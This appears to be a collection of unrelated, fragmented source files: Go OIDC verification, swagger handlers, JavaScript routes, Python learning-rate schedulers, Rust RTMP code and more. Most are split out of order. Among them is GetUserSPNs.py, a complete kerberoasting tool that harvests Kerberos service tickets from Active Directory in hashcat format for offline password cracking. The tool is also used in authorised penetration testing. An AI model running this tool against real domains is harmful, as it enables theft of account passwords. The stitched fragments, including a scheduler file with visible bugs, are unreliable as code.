delete(identity.Claims, "nbf")
delete(identity.Claims, "email")
return &identity, nil
}
// VerifyClaims parses a raw ID Token and verifies the claim.
func VerifyClaims(rawIDToken, clientID, issuer string) (*Identity, error) {
payload, err := parseJWT(rawIDToken)
if err != nil {
return nil, fmt.Errorf("oidc: malformed jwt: %v", err)
}
identityJson, err := UnmarshalIdentityJSON(payload)
if err != nil {
return nil, fmt.Errorf("oidc: failed to unmarshal claims: %v", err)
}
identity := &Identity{
Issuer: identityJson.Issuer,
Subject: identityJson.Subject,
Audience: []string(identityJson.Audience),
Expiry: time.Time(identityJson.Expiry),
IssuedAt: time.Time(identityJson.IssuedAt),
Email: identityJson.Email,
Claims: identityJson.Claims,
}
// Check issuer. Google sometimes returns "accounts.google.com" as the issuer claim instead of the required
// "https://accounts.google.com". Detect this case and allow it only for Google. We will not add hooks to let
// other providers go off spec like this.
if (identity.Issuer != issuer) && !(issuer == issuerGoogleAccounts && identity.Issuer == issuerGoogleAccountsNoScheme) {
return nil, fmt.Errorf("oidc: id token issued by a different provider, expected %q got %q", issuer, identity.Issuer)
}
// Provided client ID must be part of the audience.
if !base.ContainsString(identity.Audience, clientID) {
return nil, fmt.Errorf("oidc: expected audience %q got %q", clientID, identity.Audience)
}
// Make sure token is not expired.
now := time.Now()
if identity.Expiry.Before(now) {
return nil, fmt.Errorf("oidc: token is expired (Token Expiry: %v)", identity.Expiry)
}
// If nbf claim is provided in token, ensure that it is indeed in the past.
if identityJson.NotBefore != nil {
nbfTime := time.Time(*identityJson.NotBefore)
leeway := 1 * time.Minute
if now.Add(leeway).Before(nbfTime) {
return nil, fmt.Errorf("oidc: current time %v before the nbf (not before) time: %v", now, nbfTime)
}
}
return identity, nil
}
func parseJWT(p string) ([]byte, error) {
parts := strings.Split(p, ".")
if len(parts) < 2 {
return nil, fmt.Errorf("oidc: malformed jwt, expected 3 parts got %d", len(parts))
}
payload, err := base64.RawURLEncoding.DecodeString(parts[1])
if err != nil {
return nil, fmt.Errorf("oidc: malformed jwt payload: %v", err)
}
return payload, nil
}
type audience []string
func (a *audience) UnmarshalJSON(b []byte) error {
var s string
if json.Unmarshal(b, &s) == nil {
*a = audience{s}
return nil
}
var auds []string
if err := json.Unmarshal(b, &auds); err != nil {
return err
}
*a = audience(auds)
return nil
}
type jsonTime time.Time
func (j *jsonTime) UnmarshalJSON(b []byte) error {
var n json.Number
if err := json.Unmarshal(b, &n); err != nil {
return err
}
var unix int64
if t, err := n.Int64(); err == nil {
unix = t
} else {
f, err := n.Float64()
if err != nil {
return err
}
unix = int64(f)
}
*j = jsonTime(time.Unix(unix, 0))
return nil
}
// getIdentity returns identity claims extracted from an ID token.
func getIdentity(idToken *oidc.IDToken) (identity *Identity, ok bool, identityErr error) {
if idToken == nil {
return nil, false, errors.New("can't extract identity claims from a nil token")
}
identity = &Identity{
Issuer: idToken.Issuer,
Audience: idToken.Audience,
Subject: idToken.Subject,
Expiry: idToken.Expiry,
IssuedAt: idToken.IssuedAt,
}
claims := map[string]interface{}{}
if err := idToken.Claims(&claims); err != nil {
identityErr = pkgerrors.Wrap(err, "failed to extract identity claims from token")
}
identity.Claims = claims
if claim, found := claims["email"]; found {
var ok bool
if identity.Email, ok = claim.(string); !ok {
return identity, true, fmt.Errorf("oidc: can't cast claim %q as string", "email")
}
}
return identity, true, identityErr
} | Copyright 2020-Present Couchbase, Inc.
|
delete_api_v1_games_game_id_responses.go | // Code generated by go-swagger; DO NOT EDIT.
package operations
// This file was generated by the swagger tool.
// Editing this file might prove futile when you re-run the swagger generate command
import (
"net/http"
"github.com/go-openapi/runtime"
)
// DeleteAPIV1GamesGameIDOKCode is the HTTP code returned for type DeleteAPIV1GamesGameIDOK
const DeleteAPIV1GamesGameIDOKCode int = 200
/*DeleteAPIV1GamesGameIDOK Game successfully deleted
swagger:response deleteApiV1GamesGameIdOK
*/ | }
// NewDeleteAPIV1GamesGameIDOK creates DeleteAPIV1GamesGameIDOK with default headers values
func NewDeleteAPIV1GamesGameIDOK() *DeleteAPIV1GamesGameIDOK {
return &DeleteAPIV1GamesGameIDOK{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(200)
}
// DeleteAPIV1GamesGameIDBadRequestCode is the HTTP code returned for type DeleteAPIV1GamesGameIDBadRequest
const DeleteAPIV1GamesGameIDBadRequestCode int = 400
/*DeleteAPIV1GamesGameIDBadRequest Bad request
swagger:response deleteApiV1GamesGameIdBadRequest
*/
type DeleteAPIV1GamesGameIDBadRequest struct {
}
// NewDeleteAPIV1GamesGameIDBadRequest creates DeleteAPIV1GamesGameIDBadRequest with default headers values
func NewDeleteAPIV1GamesGameIDBadRequest() *DeleteAPIV1GamesGameIDBadRequest {
return &DeleteAPIV1GamesGameIDBadRequest{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDBadRequest) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(400)
}
// DeleteAPIV1GamesGameIDNotFoundCode is the HTTP code returned for type DeleteAPIV1GamesGameIDNotFound
const DeleteAPIV1GamesGameIDNotFoundCode int = 404
/*DeleteAPIV1GamesGameIDNotFound Resource not found
swagger:response deleteApiV1GamesGameIdNotFound
*/
type DeleteAPIV1GamesGameIDNotFound struct {
}
// NewDeleteAPIV1GamesGameIDNotFound creates DeleteAPIV1GamesGameIDNotFound with default headers values
func NewDeleteAPIV1GamesGameIDNotFound() *DeleteAPIV1GamesGameIDNotFound {
return &DeleteAPIV1GamesGameIDNotFound{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDNotFound) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(404)
}
// DeleteAPIV1GamesGameIDInternalServerErrorCode is the HTTP code returned for type DeleteAPIV1GamesGameIDInternalServerError
const DeleteAPIV1GamesGameIDInternalServerErrorCode int = 500
/*DeleteAPIV1GamesGameIDInternalServerError Internal server error
swagger:response deleteApiV1GamesGameIdInternalServerError
*/
type DeleteAPIV1GamesGameIDInternalServerError struct {
}
// NewDeleteAPIV1GamesGameIDInternalServerError creates DeleteAPIV1GamesGameIDInternalServerError with default headers values
func NewDeleteAPIV1GamesGameIDInternalServerError() *DeleteAPIV1GamesGameIDInternalServerError {
return &DeleteAPIV1GamesGameIDInternalServerError{}
}
// WriteResponse to the client
func (o *DeleteAPIV1GamesGameIDInternalServerError) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses
rw.WriteHeader(500)
} | type DeleteAPIV1GamesGameIDOK struct { |
images.js | // eslint-disable-next-line no-undef
const express = require("express");
// create new router
const router = express.Router(); | // eslint-disable-next-line no-undef
const images_controller = require("../controllers/imagesController");
router.post("/upload/product/:id", images_controller.upload_image);
router.get("/remove/product/:id", images_controller.remove_image);
router.get("/show/product/:id", images_controller.show_image);
router.get("/", images_controller.all_images);
// eslint-disable-next-line no-undef
module.exports = router; | |
SchmoeJoe.tsx | import React from 'react';
import styles from './Schmoe.module.scss';
export default function SchmoeJoe({ style }: { style?: React.CSSProperties }) {
return (
<div style={style} className={styles.schmoe}>
<img
className="Schmoe__character"
alt="Joe Schmoe illustration"
src="https://d3tycb976jpudc.cloudfront.net/schmoes/joe.svg"
/>
<img
width="325"
className="Schmoe__thought"
alt="Wow! Nu ma asteptam sa-mi placa asa mult" | src="/images/landing/characters/Schmoe_2.png"
/>
</div>
);
} | style={{ transform: 'translate(0px, 20px)' }} |
index.ts | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License;
* you may not use this file except in compliance with the Elastic License.
*/
import { RouteDependencies } from '../types';
import {
registerGetRoutes,
registerCreateRoute,
registerUpdateRoute,
registerPrivilegesRoute,
registerDeleteRoute,
registerSimulateRoute,
} from './api';
export class | {
setup(dependencies: RouteDependencies) {
registerGetRoutes(dependencies);
registerCreateRoute(dependencies);
registerUpdateRoute(dependencies);
registerPrivilegesRoute(dependencies);
registerDeleteRoute(dependencies);
registerSimulateRoute(dependencies);
}
}
| ApiRoutes |
LearningRate_Decay.py | #1.
class LR_LinearDecay():
'''
Function : -Learning rate decay linearly(a constant factor) after each epoch
-Eg. LR= 5, 5.8, 5.6, 5.4, ........
'''
def __init__(self, min_lr=1e-5, max_lr=1e-2, epochs=None):
super().__init__()
self.min_lr = min_lr
self.max_lr = max_lr
self.total_iterations = epochs
def get_lr(self, epoch_i):
'''Return the updated learning rate.'''
self.iteration = epoch_i
x = self.iteration / self.total_iterations
return self.max_lr - (self.max_lr-self.min_lr) * x
#2.
class LR_StepDecay():
'''
Function : -Learning rate decay stepwise(a varing factor) after every few epochs
- Eg. LR= 5, 5, 5, 2.5, 2.5, 2.5, 1.25, 1.25, 1.25, ......
'''
def __init__(self, max_lr=1e-2, step_size=3, decay_factor=2):
super().__init__()
self.max_lr = max_lr
self.step_size = step_size # meaning: update happens after every `step_size` iterations
self.decay_factor = decay_factor
def get_lr(self, epoch_i):
'''Return the updated learning rate.'''
self.iteration = epoch_i
x = self.iteration / self.step_size
return self.max_lr / (self.decay_factor ** int(x) )
#3.
class LR_ExponentialDecay():
'''
Function : Learning rate decay exponentially( exp(k*t) ) after each epoch
'''
def __init__(self, max_lr=1e-2, decay_factor=0.1):
super().__init__()
self.max_lr = max_lr
self.decay_factor = decay_factor
def get_lr(self, epoch_i):
'''Return the updated learning rate.'''
return self.max_lr / math.exp(self.decay_factor*epoch_i )
#4.
class LR_Cyclical():
'''
Function - This implements 2 techniques: 1.Linear annealing(to better converge at minima)
2.Learning rate linear restart(to escape local minima)
'''
def __init__(self, min_lr=1e-5, max_lr=1e-2, step_size=10, mode='triangular', gamma=1., scale_fn=None, scale_mode='cycle'):
super(CyclicLR, self).__init__()
import math
self.min_lr = min_lr
self.max_lr = max_lr
self.step_size = step_size
self.mode = mode
if scale_fn == None:
if(self.mode == 'triangular'):
self.scale_fn = lambda x: 1.
elif(self.mode == 'triangular2'):
self.scale_fn = lambda x: 1/(2.**(x-1))
elif(self.mode == 'exp_range'):
self.scale_fn = lambda x: gamma**(x)
else:
self.scale_fn = scale_fn
def get_lr(self, epoch_i):
cycle = math.floor(1 + epoch_i/(2*self.step_size))
x = math.abs (epoch_i/self.step_size - 2*cycle + 1)
return self.base_lr + (self.max_lr-self.min_lr) * (1-x) * self.scale_fn(cycle)
#5.
class LR_StochasticGradientDescentWithWarmRestarts():
'''
Function - This implements 2 techniques: 1.Cosine annealing(to better converge at minima)
2.Learning rate sharp restart(to escape local minima)
'''
def __init__(self, min_lr, max_lr, epoch_steps=10):
self.min_lr = min_lr
self.max_lr = max_lr
|
self.epoch_steps = epoch_steps # restarts after every `epoch_steps` no. of epochs
self.batch_since_restart = 0
def get_lr(self, epoch_i):
'''Calculate the learning rate.'''
self.batch_since_restart = epoch_i % epoch_steps
fraction_to_restart = self.batch_since_restart / (epoch_steps)
return self.min_lr + 0.5 * (self.max_lr - self.min_lr) * (1 + np.cos(fraction_to_restart * np.pi))
'''
Example.
>> epoch_n = 50
>> lr = LR_LinearDecay(epochs = epoch_n)
>> for epoch_i in range(1,epoch_n+1):
learning_rate = lr.get_lr(epoch_i = epoch_i )
''' | |
spec.py | #!/usr/bin/env python3 | #
# This file is part of REANA.
# Copyright (C) 2017, 2018 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""OpenAPI generator."""
from apispec import APISpec
from flask import current_app
from reana_job_controller.schemas import Job, JobRequest
def build_openapi_spec():
"""Create OpenAPI definition."""
spec = APISpec(
title='reana-job-controller',
version='0.4.0',
info=dict(
description='REANA Job Controller API'
),
plugins=[
'apispec.ext.flask',
'apispec.ext.marshmallow',
]
)
# Add marshmallow models to specification
spec.definition('Job', schema=Job)
spec.definition('JobRequest', schema=JobRequest)
# Collect OpenAPI docstrings from Flask endpoints
for key in current_app.view_functions:
if key != 'static' and key != 'get_openapi_spec':
spec.add_path(view=current_app.view_functions[key])
return spec.to_dict() | # -*- coding: utf-8 -*- |
GetUserSPNs.py | #!/usr/bin/python
# Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module will try to find Service Principal Names that are associated with normal user account.
# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
#
# ToDo:
# [X] Add the capability for requesting TGS and output them in JtR/hashcat format
# [ ] Improve the search filter, we have to specify we don't want machine accounts in the answer
# (play with userAccountControl)
#
import argparse
import logging
import os
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserSPNs:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print outputFormat.format(*header)
print ' '.join(['-' * itemLen for itemLen in colLen])
# And now the rows
for row in items:
print outputFormat.format(*row)
def __init__(self, username, password, domain, cmdLineOptions):
self.options = cmdLineOptions
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = options.outputfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__target = None
self.__requestTGS = options.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
def getMachineName(self):
if self.__kdcHost is not None:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__domain, self.__domain)
try:
s.login('', '')
except Exception:
logging.debug('Error while anonymous logging into %s' % self.__domain)
s.logoff()
return s.getServerName()
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
return TGT
else:
logging.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
#
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
if fd is None:
print entry
else:
fd.write(entry+'\n')
else:
logging.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
# Save the ticket
logging.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception, e:
logging.error(str(e))
def run(self):
if self.__doKerberos:
self.__target = self.getMachineName()
else:
if self.__kdcHost is not None:
self.__target = self.__kdcHost
else:
self.__target = self.__domain
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
except ldap.LDAPSessionError, e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
if self.__doKerberos is not True:
ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
else:
ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
self.__aesKey, kdcHost=self.__kdcHost)
else:
raise
# Building the following filter:
# (&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
# (servicePrincipalName=*)
and0 = ldapasn1.Filter()
and0['present'] = ldapasn1.Present('servicePrincipalName')
# (UserAccountControl:1.2.840.113556.1.4.803:=512)
and1 = ldapasn1.Filter()
and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
and1['extensibleMatch']['dnAttributes'] = False
# !(UserAccountControl:1.2.840.113556.1.4.803:=2)
and2 = ldapasn1.Not()
and2['notFilter'] = ldapasn1.Filter()
and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
and2['notFilter']['extensibleMatch']['dnAttributes'] = False
searchFilter = ldapasn1.Filter()
searchFilter['and'] = ldapasn1.And()
searchFilter['and'][0] = and0
searchFilter['and'][1] = and1
# searchFilter['and'][2] = and2
# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
if self.__requestUser is not None:
#(sAMAccountName:=userSuppliedName)
logging.info('Gathering data for user %s' % self.__requestUser)
and3 = ldapasn1.EqualityMatch()
and3['attributeDesc'] = ldapasn1.AttributeDescription('sAMAccountName')
and3['assertionValue'] = ldapasn1.AssertionValue(self.__requestUser)
# searchFilter['and'][3] = and3
# Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
searchFilter['and'].setComponentByPosition(3, and3, verifyConstraints=False)
try:
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['servicePrincipalName', 'sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError, e:
if e.getErrorString().find('sizeLimitExceeded') >= 0: | logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if attribute['type'] == 'sAMAccountName':
if str(attribute['vals'][0]).endswith('$') is False:
# User Account
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif attribute['type'] == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
elif attribute['type'] == 'memberOf':
memberOf = str(attribute['vals'][0])
elif attribute['type'] == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif attribute['type'] == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])
except Exception, e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
print '\n\n'
if self.__requestTGS is True or self.__requestUser is not None:
# Let's get unique user names and a SPN to request a TGS for
users = dict( (vals[1], vals[0]) for vals in answers)
# Get a TGT for the current user
TGT = self.getTGT()
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for user, SPN in users.iteritems():
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
self.__kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
except Exception , e:
logging.error(str(e))
if fd is not None:
fd.close()
else:
print "No entries found!"
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running "
"under a user account")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-request-user', action='store', metavar='username', help='Requests TGS for the SPN associated '
'to the user specified (just the username, no domain needed)')
parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is '
'<username>.ccache. Auto selects -request')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
# This is because I'm lazy with regex
# ToDo: We need to change the regex to fullfil domain/username[:password]
targetParam = options.target+'@'
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.save is True or options.outputfile is not None:
options.request = True
try:
executer = GetUserSPNs(username, password, domain, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
print str(e) | |
video_data.rs | use errors::{MessageDeserializationError, MessageSerializationError};
use rtmp_message::{RtmpMessage, RawRtmpMessage};
pub fn serialize(bytes: Vec<u8>) -> Result<RawRtmpMessage, MessageSerializationError> {
Ok(RawRtmpMessage{
data: bytes,
type_id: 9
})
}
pub fn deserialize(data: Vec<u8>) -> Result<RtmpMessage, MessageDeserializationError> {
Ok(RtmpMessage::VideoData {
data: data
})
}
#[cfg(test)]
mod tests {
use rtmp_message::RtmpMessage; |
#[test]
fn can_serialize_message() {
let message = RtmpMessage::VideoData { data: vec![1,2,3,4] };
let expected = vec![1,2,3,4];
let raw_message = message.serialize().unwrap();
assert_eq!(raw_message.data, expected);
assert_eq!(raw_message.type_id, 9);
}
#[test]
fn can_deserialize_message() {
let data = vec![1,2,3,4];
let expected = RtmpMessage::VideoData { data: vec![1,2,3,4] };
let result = RtmpMessage::deserialize(data, 9).unwrap();
assert_eq!(result, expected);
}
} | |
IDocumentRepository.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See LICENSE.md in the project root for license information.
*--------------------------------------------------------------------------------------------*/
export interface IDocumentRepository {
readonly namePrefix: string;
readonly itemName: string;
readonly itemKind: string;
readonly extension: string;
| readContent(): Promise<{ content: any, etag?: string } | undefined>;
updateContent(content: any, etag?: string): Promise<void>;
} |
|
list.component.ts | import {LoginService} from './../../services/login.service';
import {Component, OnInit} from '@angular/core';
import {Endpoint} from '../../models/endpoint';
import {EndpointService} from '../../services/endpoint.service';
@Component({
selector: 'app-list',
templateUrl: './list.component.html',
styleUrls: ['./list.component.css']
})
export class | implements OnInit {
endpoints: Endpoint[] = [];
isAdmin: boolean;
constructor(private endpointService: EndpointService, private loginService: LoginService) { }
ngOnInit(): void {
this.loadEndpoints();
this.isAdmin = this.loginService.getIsAdmin();
}
loadEndpoints(): void {
this.endpointService.list().subscribe(
data => {
this.endpoints = data;
},
err => console.log(err)
);
}
onDelete(id: number): void {
this.endpointService.delete(id).subscribe(
data => {
console.log(data);
this.loadEndpoints();
},
err => console.log(err)
);
}
}
| ListComponent |
matching.py | import numpy as np
import scipy
from scipy.spatial.distance import cdist
import lap # 0.4.0
from cython_bbox import bbox_overlaps as bbox_ious
from . import kalman_filter
def merge_matches(m1, m2, shape):
O,P,Q = shape
m1 = np.asarray(m1)
m2 = np.asarray(m2)
M1 = scipy.sparse.coo_matrix((np.ones(len(m1)), (m1[:, 0], m1[:, 1])), shape=(O, P))
M2 = scipy.sparse.coo_matrix((np.ones(len(m2)), (m2[:, 0], m2[:, 1])), shape=(P, Q))
mask = M1*M2
match = mask.nonzero()
match = list(zip(match[0], match[1]))
unmatched_O = tuple(set(range(O)) - set([i for i, j in match]))
unmatched_Q = tuple(set(range(Q)) - set([j for i, j in match]))
return match, unmatched_O, unmatched_Q
def linear_assignment(cost_matrix, thresh):
if cost_matrix.size == 0:
return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1]))
matches, unmatched_a, unmatched_b = [], [], []
cost, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)
for ix, mx in enumerate(x):
if mx >= 0:
matches.append([ix, mx])
unmatched_a = np.where(x < 0)[0]
unmatched_b = np.where(y < 0)[0]
matches = np.asarray(matches)
return matches, unmatched_a, unmatched_b
def ious(atlbrs, btlbrs):
"""
Compute cost based on IoU
:type atlbrs: list[tlbr] | np.ndarray
:type atlbrs: list[tlbr] | np.ndarray
:rtype ious np.ndarray
"""
ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float)
if ious.size == 0:
return ious
ious = bbox_ious(
np.ascontiguousarray(atlbrs, dtype=np.float),
np.ascontiguousarray(btlbrs, dtype=np.float)
)
return ious
